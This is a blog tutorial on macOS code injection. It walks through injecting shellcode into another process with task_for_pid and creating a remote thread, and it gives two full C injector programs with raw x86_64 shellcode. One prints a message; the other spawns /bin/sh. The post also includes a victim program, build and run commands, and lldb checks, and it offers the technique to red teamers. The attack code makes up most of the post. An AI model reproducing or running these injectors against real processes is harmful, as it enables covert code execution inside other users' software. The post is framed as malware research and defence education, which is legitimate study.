macOS hacking part 10: shellcode injection via task_for_pid - create remote thread. Simple C (Intel) example
﷽
Hello, cybersecurity enthusiasts and white hackers!
In the previous post we stole an existing thread: we paused a victim, rewired its registers so RIP pointed at our buffer, and let it run. That’s thread hijacking - fast, but risky: you might grab a thread in the middle of a syscall, under a lock, or with an odd stack frame. Race conditions and crashes are common.
Today, we’re going further - instead of hijacking an existing thread, we’ll create an entirely new thread in the target process using thread_create_running. This is a cleaner and more stable technique with fewer side effects.
This technique is known as remote thread injection. While it requires similar permissions (task_for_pid), the flow is slightly different. Here’s what happens:
First of all, find the PID of the victim process.
Then use task_for_pid to get the task port for the victim.
Allocate memory in the remote process.
Write your shellcode into that memory.
Mark the memory executable.
Allocate a dummy stack.
Set up CPU registers (RIP to shellcode, RSP to top of dummy stack).
Spawn a thread in the victim using thread_create_running.
practical example
Let’s build a PoC for this technique step by step.
When hijacking a thread, you’re overwriting its context, resuming it, and hoping it behaves. This can crash or deadlock the process if you’re not careful. With new thread injection, we avoid all that. We get a clean, isolated thread to run our shellcode, and the rest of the process is (mostly) untouched.
First of all, attach to the process as before:
pid_t pid = atoi(argv[1]);
task_t task;
kern_return_t kr = task_for_pid(mach_task_self(), pid, &task);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] task_for_pid() failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] attached to pid %d\n", pid);
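You’ll need root for this. Even as root, with SIP enabled task_for_pid() is typically refused for Apple platform binaries and for hardened-runtime targets that lack the get-task-allow entitlement; an unsigned test binary such as our victim works.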
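The attach snippet above reads the PID with atoi(), which silently returns 0 for input such as "abc" and ignores trailing junk. A slightly more defensive sketch is shown below; parse_pid is a hypothetical helper that is not part of hack.c, and the choice to reject 0 and negative values is an assumption made for this example.

```c
#include <assert.h>
#include <errno.h>
#include <limits.h>
#include <stdlib.h>
#include <sys/types.h>

/* Hypothetical helper (not part of hack.c): parse a decimal PID strictly.
 * Returns 0 on success and stores the value in *out, -1 on any bad input. */
static int parse_pid(const char *s, pid_t *out) {
    assert(s != NULL && out != NULL);
    char *end = NULL;
    errno = 0;
    long v = strtol(s, &end, 10);
    /* Reject overflow, empty input, and trailing non-digit characters. */
    if (errno != 0 || end == s || *end != '\0') return -1;
    /* Assumption for this sketch: only positive PIDs that fit in an int are valid. */
    if (v <= 0 || v > INT_MAX) return -1;
    *out = (pid_t)v;
    return 0;
}
```

In main(), this would stand in for the atoi() call: print the usage message and return 1 when parse_pid() returns -1.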
Then use mach_vm_allocate() to find a page in the remote address space and allocate memory for the shellcode.
mach_vm_address_t remote_addr = 0;
vm_size_t shellcode_size = sizeof(shellcode);
kr = mach_vm_allocate(task, &remote_addr, shellcode_size, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_allocate failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] allocated memory at 0x%llx\n", remote_addr);
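Mach VM hands out memory in whole pages, so even a request of a few dozen bytes ends up occupying a full page, and later protection changes apply to that whole page too. The arithmetic can be sketched as follows; round_up_to_page and ASSUMED_PAGE_SIZE are illustrative names, and the 4 KiB page size is an assumption that matches Intel Macs (real code should query the page size at run time).

```c
#include <assert.h>
#include <stdint.h>

/* Assumption: 4 KiB pages, as on Intel macOS. */
#define ASSUMED_PAGE_SIZE 0x1000ULL

/* Round size up to the next multiple of page_size.
 * page_size must be a non-zero power of two. */
static uint64_t round_up_to_page(uint64_t size, uint64_t page_size) {
    assert(page_size != 0 && (page_size & (page_size - 1)) == 0);
    return (size + page_size - 1) & ~(page_size - 1);
}
```

For example, round_up_to_page(42, ASSUMED_PAGE_SIZE) gives 0x1000: one page.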
Write shellcode to remote memory:
kr = mach_vm_write(task, remote_addr, (vm_offset_t)shellcode, shellcode_size);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_write failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] wrote shellcode\n");
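One small detail about the size passed to the write call: when a byte array is initialised from a string literal, sizeof() also counts the implicit terminating NUL, so one extra zero byte is copied. That is harmless here, but worth knowing when sizes matter. A minimal sketch of the arithmetic, using stand-in bytes (demo_bytes and PAYLOAD_LEN are hypothetical names, not part of hack.c):

```c
#include <assert.h>
#include <stddef.h>

/* Number of payload bytes in an array initialised from a string literal:
 * sizeof() counts the implicit terminating '\0', so subtract one. */
#define PAYLOAD_LEN(arr) (sizeof(arr) - 1)

/* Hypothetical stand-in bytes, used only to demonstrate the size arithmetic. */
static const unsigned char demo_bytes[] = "\x01\x02\x03";

/* Compile-time checks (C11): three payload bytes plus the implicit NUL. */
static_assert(sizeof(demo_bytes) == 4, "three bytes plus the implicit NUL");
static_assert(PAYLOAD_LEN(demo_bytes) == 3, "payload bytes only");
```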
Next, flip the pages to R-X. Executing from a non-executable page triggers a bus error on macOS, so don’t skip this.
kr = mach_vm_protect(task, remote_addr, shellcode_size, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_protect failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] set memory protections to RX\n");
Set up the new thread state and a dummy stack:
// setup new thread state
x86_thread_state64_t state;
thread_act_t thread;
mach_msg_type_number_t state_count = x86_THREAD_STATE64_COUNT;
memset(&state, 0, sizeof(state));
// set instruction pointer (rip) to our shellcode
state.__rip = remote_addr;
// stack pointer (rsp) should be valid; just allocate a dummy stack
mach_vm_address_t remote_stack = 0;
kr = mach_vm_allocate(task, &remote_stack, 0x1000, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_allocate (stack) failed: %s\n", mach_error_string(kr));
return 1;
}
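The x86_64 System V ABI expects RSP + 8 to be 16-byte aligned at function entry, which is the state right after a call pushes its return address. So set RSP to the top of that region minus 8 (this is not a red zone; the red zone is the 128 bytes below RSP):
state.__rsp = remote_stack + 0x1000 - 8; // top of stack minus 8, as if just after a call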
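The stack pointer arithmetic can be written as a tiny helper that works for any base and size. This is only a sketch of the calculation; initial_rsp is a hypothetical name, and the 32-byte minimum size is an arbitrary assumption to keep the result inside the region.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: pick an initial RSP inside [base, base + size).
 * The top is rounded down to 16 bytes, then 8 is subtracted so that
 * (rsp + 8) % 16 == 0, the state a callee sees right after `call`. */
static uint64_t initial_rsp(uint64_t base, uint64_t size) {
    assert(size >= 32);
    uint64_t top = (base + size) & ~(uint64_t)0xF;
    return top - 8;
}
```

With a page-aligned base and a size of 0x1000 this yields the same value as the line above, base + 0x1000 - 8.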
Finally, create the thread:
kr = thread_create_running(task,
x86_THREAD_STATE64,
(thread_state_t)&state,
state_count,
&thread);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] thread_create_running failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] remote thread created at RIP=0x%llx, RSP=0x%llx\n", state.__rip, state.__rsp);
printf("[+] shellcode running in PID %d via new thread.\n", pid);
What is going on here? We ask the kernel to spin up a new thread in the target with your register context. The scheduler will start it at your entry point.
Finally, we need shellcode:
unsigned char shellcode[] =
"\x48\xb8\x4d\x65\x6f\x77\x0a\x00\x00\x00"
"\x50\xbf\x01\x00\x00\x00"
"\x48\x89\xe6\xba\x05\x00\x00\x00"
"\xb8\x04\x00\x00\x02\x0f\x05"
"\xb8\x01\x00\x00\x02\x48\x31\xff\x0f\x05";
It comes from one of the previous posts in this macOS hacking series:
global start
section .text
start:
mov rax, 0x0a776f654d ; "\nwoeM" in little-endian
push rax ; string now on stack
mov rdi, 1 ; fd = 1 (stdout)
mov rsi, rsp ; pointer to "Meow\n"
mov rdx, 5 ; length = 5 bytes
mov rax, 0x2000004 ; syscall: write
syscall
mov rax, 0x2000001 ; syscall: exit
xor rdi, rdi ; exit code 0
syscall
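Two constants in this listing are worth decoding by hand. On x86_64 macOS, BSD syscall numbers carry a class in the upper bits of RAX (class 2, i.e. 0x2000000), so write (4) becomes 0x2000004 and exit (1) becomes 0x2000001; note that exit ends the whole process, not only the injected thread. The 64-bit immediate 0x0a776f654d is simply "Meow\n" once stored in little-endian order. A small sketch that checks both; unix_syscall and imm64_to_bytes are hypothetical helper names introduced for illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* BSD ("UNIX") syscall class on x86_64 macOS: class 2 in bits 24 and up. */
#define SYSCALL_CLASS_UNIX_BITS 0x2000000u

/* Build the value loaded into RAX for BSD syscall number n. */
static uint32_t unix_syscall(uint32_t n) {
    return SYSCALL_CLASS_UNIX_BITS | n;
}

/* Write a 64-bit immediate into buf in little-endian byte order,
 * independent of the host's endianness. buf must hold 9 bytes;
 * the ninth byte is a terminating NUL. */
static void imm64_to_bytes(uint64_t imm, char buf[9]) {
    assert(buf != NULL);
    memset(buf, 0, 9);
    for (int i = 0; i < 8; i++)
        buf[i] = (char)((imm >> (8 * i)) & 0xFF);
}
```

Calling imm64_to_bytes(0x0a776f654dULL, buf) leaves the C string "Meow\n" in buf, which is exactly what the push places on the stack.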
So the full source code (hack.c) looks like this:
/*
* hack.c
* macOS x86_64 shellcode injection
* using task_for_pid and
* remote thread creation
* author @cocomelonc
* https://cocomelonc.github.io/macos/2025/08/24/malware-mac-10.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/thread_act.h>
#include <mach/thread_status.h>
unsigned char shellcode[] =
"\x48\xb8\x4d\x65\x6f\x77\x0a\x00\x00\x00"
"\x50\xbf\x01\x00\x00\x00"
"\x48\x89\xe6\xba\x05\x00\x00\x00"
"\xb8\x04\x00\x00\x02\x0f\x05"
"\xb8\x01\x00\x00\x02\x48\x31\xff\x0f\x05";
int main(int argc, char *argv[]) {
if (argc != 2) {
fprintf(stderr, "usage: %s <pid>\n", argv[0]);
return 1;
}
pid_t pid = atoi(argv[1]);
task_t task;
kern_return_t kr = task_for_pid(mach_task_self(), pid, &task);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] task_for_pid() failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] attached to pid %d\n", pid);
mach_vm_address_t remote_addr = 0;
vm_size_t shellcode_size = sizeof(shellcode);
kr = mach_vm_allocate(task, &remote_addr, shellcode_size, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_allocate failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] allocated memory at 0x%llx\n", remote_addr);
kr = mach_vm_write(task, remote_addr, (vm_offset_t)shellcode, shellcode_size);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_write failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] wrote shellcode\n");
kr = mach_vm_protect(task, remote_addr, shellcode_size, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_protect failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] set memory protections to RX\n");
// setup new thread state
x86_thread_state64_t state;
thread_act_t thread;
mach_msg_type_number_t state_count = x86_THREAD_STATE64_COUNT;
memset(&state, 0, sizeof(state));
// set instruction pointer (rip) to our shellcode
state.__rip = remote_addr;
// stack pointer (rsp) should be valid; just allocate a dummy stack
mach_vm_address_t remote_stack = 0;
kr = mach_vm_allocate(task, &remote_stack, 0x1000, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_allocate (stack) failed: %s\n", mach_error_string(kr));
return 1;
}
state.__rsp = remote_stack + 0x1000 - 8; // top of stack minus 8, as if just after a call
kr = thread_create_running(task,
x86_THREAD_STATE64,
(thread_state_t)&state,
state_count,
&thread);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] thread_create_running failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] remote thread created at RIP=0x%llx, RSP=0x%llx\n", state.__rip, state.__rsp);
printf("[+] shellcode running in PID %d via new thread.\n", pid);
return 0;
}
demo
Let’s see this in action. First of all, we need a “victim” process. As usual, let me use meow.c:
/*
* meow.c
* victim process for macOS injection tests
* author @cocomelonc
* https://cocomelonc.github.io/macos/2025/08/24/malware-mac-10.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
printf("victim process started. PID: %d\n", getpid());
while (1) {
printf("meow-meow... PID: %d\n", getpid());
sleep(5); // simulate periodic activity
}
return 0;
}
Compile it:
clang -o meow meow.c
and check:
./meow
Then compile our injector:
clang -o hack hack.c
And run:
./hack <PID>
As you can see, everything worked perfectly! =^..^=
practical example 2
In this case, we only swap in a different shellcode; the rest of the injector stays the same:
/*
* hack2.c
* macOS x86_64 shellcode injection
* using task_for_pid and
* remote thread creation
* author @cocomelonc
* https://cocomelonc.github.io/macos/2025/08/24/malware-mac-10.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/thread_act.h>
#include <mach/thread_status.h>
unsigned char shellcode[] =
/* 0000 */ "\x31\xf6" /* xor esi, esi */
/* 0002 */ "\xf7\xe6" /* mul esi */
/* 0004 */ "\x0f\xba\xe8\x19" /* bts eax, 0x19 */
/* 0008 */ "\xb0\x3b" /* mov al, 0x3b */
/* 000A */ "\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68" /* movabs rbx, 0x68732f2f6e69622f */
/* 0014 */ "\x52" /* push rdx */
/* 0015 */ "\x53" /* push rbx */
/* 0016 */ "\x54" /* push rsp */
/* 0017 */ "\x5f" /* pop rdi */
/* 0018 */ "\x0f\x05"; /* syscall */
int main(int argc, char *argv[]) {
if (argc != 2) {
fprintf(stderr, "usage: %s <pid>\n", argv[0]);
return 1;
}
pid_t pid = atoi(argv[1]);
task_t task;
kern_return_t kr = task_for_pid(mach_task_self(), pid, &task);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] task_for_pid() failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] attached to pid %d\n", pid);
mach_vm_address_t remote_addr = 0;
vm_size_t shellcode_size = sizeof(shellcode);
kr = mach_vm_allocate(task, &remote_addr, shellcode_size, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_allocate failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] allocated memory at 0x%llx\n", remote_addr);
kr = mach_vm_write(task, remote_addr, (vm_offset_t)shellcode, shellcode_size);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_write failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] wrote shellcode\n");
kr = mach_vm_protect(task, remote_addr, shellcode_size, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_protect failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] set memory protections to RX\n");
// setup new thread state
x86_thread_state64_t state;
thread_act_t thread;
mach_msg_type_number_t state_count = x86_THREAD_STATE64_COUNT;
memset(&state, 0, sizeof(state));
// set instruction pointer (rip) to our shellcode
state.__rip = remote_addr;
// stack pointer (rsp) should be valid; just allocate a dummy stack
mach_vm_address_t remote_stack = 0;
kr = mach_vm_allocate(task, &remote_stack, 0x1000, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_allocate (stack) failed: %s\n", mach_error_string(kr));
return 1;
}
state.__rsp = remote_stack + 0x1000 - 8; // top of stack minus 8, as if just after a call
kr = thread_create_running(task,
x86_THREAD_STATE64,
(thread_state_t)&state,
state_count,
&thread);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] thread_create_running failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] remote thread created at RIP=0x%llx, RSP=0x%llx\n", state.__rip, state.__rsp);
printf("[+] shellcode running in PID %d via new thread.\n", pid);
return 0;
}
demo 2
Let’s see the second example in action.
Compile it:
clang -o hack2 hack2.c
Run victim process:
./meow
Then run injector:
./hack2 <PID>
As you can see, in this case everything also worked as expected! =^..^=
For debugging purposes, you can use lldb:
lldb -p <PID>
thread list
After running the injector, check the thread list again:
thread list
As you can see, the new thread was successfully created!
Check the shellcode:
disassemble --start-address=<our_remote_address> --count=16
As you can see, the shellcode was successfully injected and the thread created! =^..^=
Unfortunately, lldb doesn’t let you search threads by address directly - you’ll have to look manually. Breakpoints can be tricky because you don’t know the shellcode address ahead of time unless the injector prints it. If your thread finishes quickly, lldb might not catch it unless you attach early.
If you want, you can use lldb Python scripting to auto-select the injected thread by its TID or to dump memory around RIP.
conclusion
Thread hijack shows how fragile cross-process execution can be. Remote thread creation shows the stable alternative: give your code a clean context and stack, don’t kidnap a live worker. Both leave trails; both are increasingly constrained by platform hardening. Understanding the mechanics helps defenders build better telemetry - and helps researchers avoid self-inflicted crashes.
I hope this post is useful for malware researchers, macOS/Apple security researchers, and C/C++/ASM programmers, raises blue teamers’ awareness of this interesting technique, and adds a weapon to the red teamers’ arsenal.
macOS hacking part 1
macOS hacking part 9
source code in github
This is a practical case for educational purposes only.
Thanks for your time, happy hacking, and goodbye!
PS. All drawings and screenshots are mine